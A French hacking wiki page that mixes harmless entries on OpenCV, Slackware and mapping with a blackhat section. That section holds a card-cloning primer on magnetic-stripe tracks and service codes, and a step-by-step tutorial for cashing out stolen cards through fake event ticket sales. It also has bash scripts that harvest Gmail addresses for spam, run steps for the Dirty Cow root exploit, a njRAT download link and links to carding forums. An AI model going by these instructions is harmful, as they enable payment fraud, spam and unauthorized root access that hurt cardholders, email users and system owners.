Soutenir Vision du Web dans son partage de logiciels et de ressources libres

Ce mineur crée de la monnaie numérique Monero pour soutenir Vision du web.
Merci de désactiver votre bloqueur de publicité.
Aucune publicité ne sera affichée.
Le mineur utilise les ressources de votre machine pour créer gratuitement de la monnaie numérique.
Le montant des donations pour Vision du web est de 0.072990160258197 Monero.

Sommaire We make Hack

De Wiki. Analyse, Communication, Développement, Hacking.
Aller à : navigation, rechercher
Naviguer sur le wiki : Accueil du wiki - Administrateur - Développeur - Intégrateur - Marketing - Multimédia - Objectifs - We make Hack
Naviguer sur le site : Accueil du site - Les annuaires - Les éditoriaux - Le forum - Les outils - Les projets
 
Consulter le sommaire de cette page en étant déconnecté du réseau : Télécharger le sommaire en PDF

Sommaire

Sommaire We make Hack

Les recherches collaboratives et travaux collaboratifs ouverts avec d'autres personnes et communautés.

OpenCV

OpenCV.

Installer Slackware

The Slackware Linux Project.
Site officiel : www.slackware.com
Documentation officielle : docs.slackware.com
Distribution Live : bear.alienbase.nl/mirrors/slackware/slackware-live/
Vos questions sur : www.linuxquestions.org/questions/slackware-14/

SIG et géolocalisation

ArcGIS logiciel SIG par Environmental Systems Research Institute

ArcGIS logiciel SIG par Environmental Systems Research Institute

3 formes de géolocalisation pour le web

1) GEOIP : une BDD externe qui jumelle ton IP a une région.
2) GOOGLE LOCATION : qui utilise un GPS pour identifier ta location spécifique et maintenant.
3) La géolocalisation HTML 5 : je ne connais pas sont fonctionnement pour identifier la géolocalisation.

Calculer des distances sur une carte de la route

Calculer des distances sur une carte de la route.

Openstreetmap

Les données brutes du projet OpenStreetMap sont accessibles à tous sous licence libre "ODbL".
Cette liberté permet à chacun d’utiliser la base commune pour afficher un plan sur son site web ou pour tout autre usage personnalisé.
Source : http://www.openstreetmap.fr

BlackHat

Bypass un captcha

La communauté BitcoinBlackHat propose un solveur de captcha.

Carding

Les docks sont des appareils utilisés par les cardeurs pour cloner de vraies cartes bancaires pour ensuite utiliser des clones comme si on utilisait des cartes authentiques.
Une carte clone est une duplication d'une vraie carte et peut être utilisée comme une vraie carte.
Le dump est une banque de données connectée à un compte bancaire et encodé sur la bande magnétique de la carte bancaire.
Chaque carte est attachée à un compte bancaire.
La carte est le terminal qui permet au propriétaire d'un compte d'accéder au solde de son compte sans avoir à entrer dans une banque.
Les cartes peuvent être utilisées avec ATM ou POS qui sont également des terminaux bancaires.
Si un hacker accède aux informations stockées dans la bande magnétique de la carte, il accède au compte carte du propriétaire et à l'argent économisé.
Voler une décharge de carte n'est pas difficile. Les décharges peuvent être obtenues par écrémage, reniflement ou piratage.
Chaque fois qu'une personne paie avec sa carte, elle assume le risque que les données de sa carte puissent être volées.
Les décharges bancaires ont normalement 3 pistes.
Si l'une des 3 pistes est correcte et qu'il y a une quantité suffisante de fonds sur le compte, alors, la carte est bonne pour être utilisée et la transaction demandée peut être approuvée.

La piste 1

La piste 1 est la seule piste de la carte qui contient le nom du détenteur.
Le cardeur utilise lapiste 1 pour changer le nom de la piste afin de correspondre aux faux identifiants qu'il possède ou avec le nom en relief sur le plastique.
Cette piste est écrite avec un code connu sous le nom de parité impaire ou DEC SIXBIT.

La piste 2

La piste 2 est la piste développée par l'industrie bancaire et c'est la piste la plus intéressante pour un dump.
Presque toutes les vidages fonctionneront si cette piste 2 est correcte. Il est écrit avec un schéma à 5 bits, 4 bits de données et 1 parité.

La piste 3

La piste 3 est pratiquement inutilisée par les principaux réseaux mondiaux.
Elle a été développée par Thrift Saving Industry. Il semblerait que les points de ventes ne lisent pas cette piste.

Code de service

Le code de service de carte est un code de 3 chiffres présent dans la piste 1 et la piste 2.
Chacun des 3 chiffres du code a une signification et lire ces chiffres ensemble comme un code de service nous permet de savoir où et comment la carte peut être utilisée.

Le premier chiffre

1 carte pour un usage international.
2 carte pour un usage international mais avec la puce.
5 carte pour un usage national.
6 carte pour un usage national mais avec la puce.
7 carte qui ne sont pas bonnes pour l'échange sauf pour les accords bilatéraux

Le deuxième chiffre

0 carte est normale, sans restriction.
2 émetteur doit être contacté via des moyens en ligne.
4 émetteur doit être contacté par des moyens en ligne, sauf en vertu d'accords bilatéraux.

Le troisième chiffre

0 pas de restriction mais le code PIN est requis.
1 pas de restrictions.
2 carte pouvant être utilisée pour le paiement des biens et services mais pas pour l'argent.
Utilisation de 3-ATM seulement, le code PIN est requis
4 carte pour retirer des espèces uniquement.
5 carte pouvant être utilisée pour le paiement des biens et services, mais pas pour l'argent mais le code PIN est requis.
6 pas de restrictions, le code PIN doit être utilisé lorsque c'est faisable.
Ainsi, la bande magnétique de la carte ou / et la puce contiennent toutes les informations pour accéder et exploiter un compte bancaire connecté à cette carte.
Si quelqu'un a copié une bande magnétique de carte, cette personne peut utiliser une machine appelée MSR, Magnetic Strip Reader-Writer et écrire les données de la carte sur une autre carte pour utiliser le clone comme carte authentique.
Si vous pensez qu'il est difficile de copier la bande magnétique sur une carte, sachez qu'un simple glissement vers un mini MSR ou un glissement de carte dans un point de vente compromis est tout ce dont les cardeurs ont besoin pour obtenir les données de la carte authentique et obtenir l'accès au compte des propriétaires de la carte. Il n'est donc pas si compliqué d'escroquer une cible à partir de sa carte bancaire dupliquée.
Source originale, en anglais : https://honeymoney24cc.com/dumpscash/

Exemple de technique employée pour faire un cashout

1 TUTO CASHOUT CC => IBAN OU PAYPAL Bonjour a toi cardeur, je vais t expliquer comment sortir de l argent de tes cc en cash. Tout d abord les prérequis : - Une CC fresh - Socks 5 + VPN - Un compte anonyme ou un Paypal anonyme également Le principe : Nous allons créer un événement sur un site (mariage, gala etc.), communiquer cet événement par mail pour remmener des gens sur notre page d achat de billets (sa c est pour passer discret) et ensuite commander gracieusement des places préventes, puis cashout.
2 1- Tout d abord, go sur le site : evenbrite.com, en haut a droite (en bleu) cliquer sur l onglet «créer un événement», rentrer votre adresse mail anon ainsi qu un mot de passe puis cliquer sur «ouvrir un compte». 2- La vous allez créer l événement Rentrer vos informations en fonction du nom de votre compte bancaire ou Paypal et blablater un peu, mettez un logo (sa fait toujours mieux) pour plus de professionnalisme, faite quelque chose de serieux, il faut vraiment que le site est l impression que vous allez faire votre évenement de l année. Pour finir mettez l adresse d une salle dans la ville ou vous allez faire votre prétendu évenement.
3 3- Créer les billets que vous allez ensuite carder Nom du billet : Mettez «Place», quantité et prix en fonction de ce que vous voulez sortir de votre cashout, ne perdez pas votre temps à mettre 5 places a 10, mais ne soyez pas trop gourmand non plus, personnellement je mets 40 places a 20 euros pièces, pour un cashout d environ 800. Sélectionnez l événement que vous voulez et le thème et cliquez sur «billets restants». Puis publiez votre événement. C est bon votre événement est finis, félicitation!
4 4- Maintenant nous allons aller dans «confirmer ses options de paiements» dans la page principale de votre événement. La rien de plus simple, dans «Mode de paiement» vous sélectionnez si vous souhaitez être payer par virement bancaire ou par Paypal. Selon le mode de paiement vous devrez rentrer vos numéros de RIB pour le virement ou les identifiants de votre compte Paypal. 5- Maintenant, et afin d être discret au niveau du site afin qu il enregistre des visiteurs pour l événement, nous allons aller dans la rubrique «inviter et promouvoir».
5 Et la il faut s'amuser à cliquer sur les liens qui redirige vers la page de l événement (chaque jour nous devons remmener des visiteurs) pour faire croire au site a un afflux de visiteurs (tous les jours je le rappelle, c est très important). Donc : - Cliquer pleins de fois sur «Assister a l événement» dans la rubrique «invitation mail» - Cliquez aussi plusieurs fois sur «liens de suivi» et copier coller le lien dans la barre de recherche plusieurs fois, il vous redirigera sur la page de l’événement Après sa vous allez dans graphique, et vous allez voire combien de «visiteurs» il y a eu sur votre événement dans la journée.
6 Le stratagème est la, dés que vous avez acquis assez de faux visiteurs vous pouvez carder allégrement les billets mis en ventes. Vous pouvez donc vous dirigez sur la page de paiement, évidemment pour aller à la page de paiement cliquez sur les liens de redirection, sa fait plus vrai. Je récapitule : Vous avez cliquez 30 ou 40 fois sur les liens de promotions et avez donc acquis 30 ou 40 visiteurs. Noté le lien de suivi sur votre bloc note. (le lien de suivi est le lien de redirection vers la page de votre événement pour les invités) Lancer votre VM, VPN et SOCKS 5, copier-coller le lien de suivi dans Google (pour faire croire a un acheteur qui a été invité) et achetez des tickets. Chaque jour de card doit se dérouler comme suit => Remmener des visiteurs puis carder.
7 Si vous avez fait dérouler votre événement dans 5 jours, remmener chaque jour une trentaine de visiteurs sur votre événement et carder 15 ou 20 billets en fonction du nombre de places et du prix de vente. La cerise sur le gâteau et de ne pas vendre tous les billets pour faire plus vrai. Après avoir cardé les billets toute la semaine, attendez que le site vous vire l argent, environ 5 jours après. Retirer l argent, et voila, vous avez votre première liasse de billets acquis au carding!
Source : https://docplayer.fr/2204699-Tuto-cashout-cc-iban-ou-paypal.html

Forum dédié au carding

Un forum Blackhat dédié au carding apportera plus d'informations sur ce sujet :
https://carding.community
https : // prvtzone . ws
https://darkpro.ws

Conclusion

On constate après quelques recherches que cette pratique reste potentiellement relativement simple à mettre en oeuvre.
L'utilisation des appareils servant a créer des copies de cartes bancaires semble être réservé à un public autorisé.
Le carding de cartes bancaires est interdit.

Hacker avec Javascript

Hacker avec Javascript.

IP Caméras - Mots de passe par défaut

https://ipvm.com/reports/ip-cameras-default-passwords-directory

Le Phishing

Phishing avec PHP.

Spam avec GMail

Une négligence de la part de Google découverte en 2011. En effet, il est possible de récupérer par le biais d'un sitemap l'ensemble des adresses des profils Google.
Celles-ci, bien que masquées par un ID, redirigent dans la plupart des cas, vers des adresses de la forme https://profiles.google.com/Zer00CooL ou Zer00CooL serait un pseudo utilisé avec Gmail ce qui permet à n'importe qui d'en déduire l'adresse Gmail rattachée au profil consulté.
Voici une méthode avec des commandes bash pour récupérer l'ensemble des 35 millions d'adresses Gmail.
Cette méthode nécessite un espace disque de stockage important. Compter 20 Go ou plus pour être sur de pouvoir télécharger l'ensemble des données.
Pour commencer, on récupère le fameux sitemap de Google :
mkdir google-urls-profile && cd google-urls-profile
wget --quiet http://www.gstatic.com/s2/sitemaps/profiles-sitemap.xml
On parse son contenu pour en extraire uniquement les URLs et on les télécharge :
cat profiles-sitemap.xml | grep "<loc>" | tr -d '\t' | sed 's/^<.*>\([^<].*\)<.*>$/\1/' > list.txt
for url in `grep http list.txt`; do wget --quiet $url; done; 
Au final, on se retrouve avec de nombreux fichiers Sitemap. Les regrouper en un seul fichier :
$ cat sitemap-*.txt > profile-urls.txt
La commande wc nous confirme que nous sommes bien en possession des 35 millions d'URLs pointant vers des profils Google.
$ wc -l profile-urls.txt
35 442 725 profile-urls.txt
Si on inspecte leur contenu, les adresses sont de la forme suivante :
https://profiles.google.com/1171359025719387936
https://profiles.google.com/1120069527109493321
Les données ne sont donc pas exploitables telles quelles, car le profil Google de chaque utilisateur est masqué par un ID (ex: 1171359025719387936) qui ne nous donne aucune indication.
Mais cette adresse redirige, dans la plupart des cas, vers https://profiles.google.com/PSEUDOGMAIL.
En fait, cela est vrai quand un utilisateur a activé le mode "user friendly" dans son compte.
Nous allons être obligés de tester l'ensemble des 35 millions d'URLs ce qui prend pas mal de temps, pour récupérer l'adresse qui se cache derrière cette redirection.
On peut le faire assez facilement avec ce script, nommé getmail.sh :
#!/bin/bash
for url in `cat $1`
do
curl --silent --head $url | grep "^Location:" >> getmail.txt
done
Appeller le script comme ça :
chmod +x getmail.sh
for file in `ls sitemap-*.txt`; do ./getmail.sh $file; rm -f $file; done; 
L'avantage de cette méthode est la suivante :
Si une adresse de profil ne possède pas de redirection, le champ "Location:" donné par la commande curl ne sera pas renseigné.
Cela permet de filtrer uniquement les adresses avec un pseudo Gmail valide.
Une fois le traitement terminé, il ne nous reste plus qu'à rajouter "@gmail.com" à la fin de chaque pseudo, pour construire une liste valide :
cat getmail.txt | awk -F'google.com/' '{print $2"@gmail.com"}' 
Dans ce cas précis, cette méthode a permis de construire une liste de 15 000 adresses Gmail en moins d'une heure.
Je me suis arrêté avant la fin, car je n'ai finalement aucun intérêt à collecter ce genre d'informations.
N'importe qui peut utiliser cette méthode pour constituer une liste d'adresses mail et la revendre à des spammeurs par exemple.
Par Sébastien Bilbeau, publié le 20 mai 2011 : http://www.tux-planet.fr/comment-recuperer-les-35-millions-dadresses-gmail/

Faille Cross-Site Scripting XSS

Source : https://fr.wikipedia.org/wiki/Cross-site_scripting

DNS Spoffing Attaque et contre attaque

Scanner de sécurité pour votre site internet

Wapiti

File Handling Errors (Local and remote include/require, fopen, readfile…)
Database Injections (PHP/JSP/ASP SQL Injections and XPath Injections)
XSS (Cross Site Scripting) Injection
LDAP Injection
Command Execution detection (eval(), system(), passtru()…)
CRLF Injection (HTTP Response Splitting, session fixation…)
Wapiti : http://www.ict-romulus.eu/web/wapiti/home

Secapps

Application en ligne payante en démonstration durant 14 jours.
Secapps : https://secapps.com

RAT

RAT : Remote Administration Tool - Outil d'administration à distance.

Créer un rat en Python

Créer un rat en Python.

Hacker et prendre le contrôle d'un ordinateur à distance avec njRAT

Hacker et prendre le contrôle d'un ordinateur à distance avec njRAT le 2 Mars 2017
Téléchargement njRAT version officielle: https://www.up-4ever.com/jfhzoobp9wvx
hack123

RAT - Informations complémentaires

Source : http://assiste.com.free.fr/p/abc/a/rat_remote_administration_tool.html

Social Recon

Social Recon - Osint Scraper : https://github.com/famavott/osint-scraper
Voir : https://www.visionduweb.eu/forum/hack-et-pentest/2143-social-recon-trouver-les-informations-liees-a-un-mail-ou-un-pseudo

Avoir les privilèges de super utilisateur root sous GNU/Linux avec la faille Dirty Cow

Télécharger depuis Github un fichier  zip (CVE-2016-5195) qui nous permettra d'exploiter la faille Dirty Cow.
Source : https//github.com/gbonacini/CVE-2016-5195
cd Desktop             cette ligne de commande est pour naviger vers le bureau
cd CVE-2016-5195       cette ligne de commande est pour entrer dans le dossier CVE-2016-5195
id                     cette ligne de commande vous permettra de savoir que vous etes sous un simple compte utilisateur 
make                   la commande make sans arguments exécute la première règle du Makefile
./dcow                 cette ligne de commande est pour executer l'exploit de Durty Cow.
Après l’exécution de la dernière commande ./dcow , vous aurez pour résultat un mot de passe : "dirtyCowFun" qu'il faut saisir après la commande su après ça vous aurez les privilèges du super utilisateur.
Source : http://www.walidtech.com/2016/11/walidtech-hacking-linux-exploit.html

01001110011001010111011101100010011010010110010101100011011011110110111001110100011001010111001101110100

Challenge Cryptographie

1+3+3=7

Déchiffrer : 13m07d3p45533572341173
Leet Speak 1337 5p34k ou encore Leet Speak 1337 5|*34|< utilise des caractères et des symboles pour écrire d'une manière peu compréhensible pour un débutant afin de se différencier de lui.
Le principe est d'écrire des caractères avec d'autres graphiquement proches.
Utiliser un outil pour lire ou écrire en Leet Speak : https://www.dcode.fr/leet-speak-1337
Résultat : IEmOTdEpASSEESTREAIITE
La phrase est à convertir en minuscule, et permet alors de connaître le mot de passe.

Challenge Programmation

Renvoi

Challenge de Connexion Web avec Python.

Valider les challenges

Les solutions : http://01001110011001010111011101100010011010010110010101100011011011110110111001110100011001010111001101110100-solution.blogspot.com
Autres propositions de scripts pour avancer avec les challenges de 01001110011001010111011101100010011010010110010101100011011011110110111001110100011001010111001101110100.
Le Github de Zer00CooL : https://github.com/ZerooCool/01001110011001010111011101100010011010010110010101100011011011110110111001110100011001010111001101110100

Warez

Final Fantasy 7.

Politiques de transition écologique et économique

Politiques de transition écologique et économique.

Support utilisateur

Intégrer un service de support utilisateur avec Livezilla : https://www.livezilla.net/features/en/

Dictionnaire

Dictionnaire.

NAVIGATION

PARTICIPER ET PARTAGER

Vous êtes sur le wiki de Vision du Web.
Les pages présentées sur le wiki évoluent tous les jours.
Certaines recherches sont peu abouties et incluent des erreurs.
Pour participer sur le wiki, créer un compte utilisateur en haut à droite.
La recherche interne du wiki permet de trouver le contenu qui vous intéresse.
Identifiez-vous pour poser vos questions sur la page de discussion de VisionDuWeb.
Améliorer le contenu des pages en faisant des propositions depuis l'onglet discussion.
Pour écrire en Markdown : Éditeur - Générateur de tableau 1 - Générateur de tableau 2.
Les informations du wiki ne doivent pas servir à nuire à autrui ou à un système informatique.
De nombreux outils gratuits sont listés et disponibles dans la boîte à outils de Vision du web.
D'autres pages du wiki peuvent correspondre à vos attentes. La liste de toutes les pages du wiki.

VALORISER LE WIKI

Valoriser le contenu partagé sur le wiki avec un don en monnaie numérique :
AEON - Bitcoins (BTC) - Bitcoins Cash - Bitcoins Gold - Bitcore (BTX) - Blackcoins - Bytecoins - Clams - Dash - Monero - Dogecoins - Ethereum - Ethereum Classique - Litecoins - Potcoins - Solarcoins - Zcash

OBTENIR DE LA MONNAIE NUMERIQUE

Obtenir gratuitement de la monnaie numérique :
Gagner des Altcoins - Miner des Altcoins.
Miroir PlanetHoster du 1er Novembre 2018.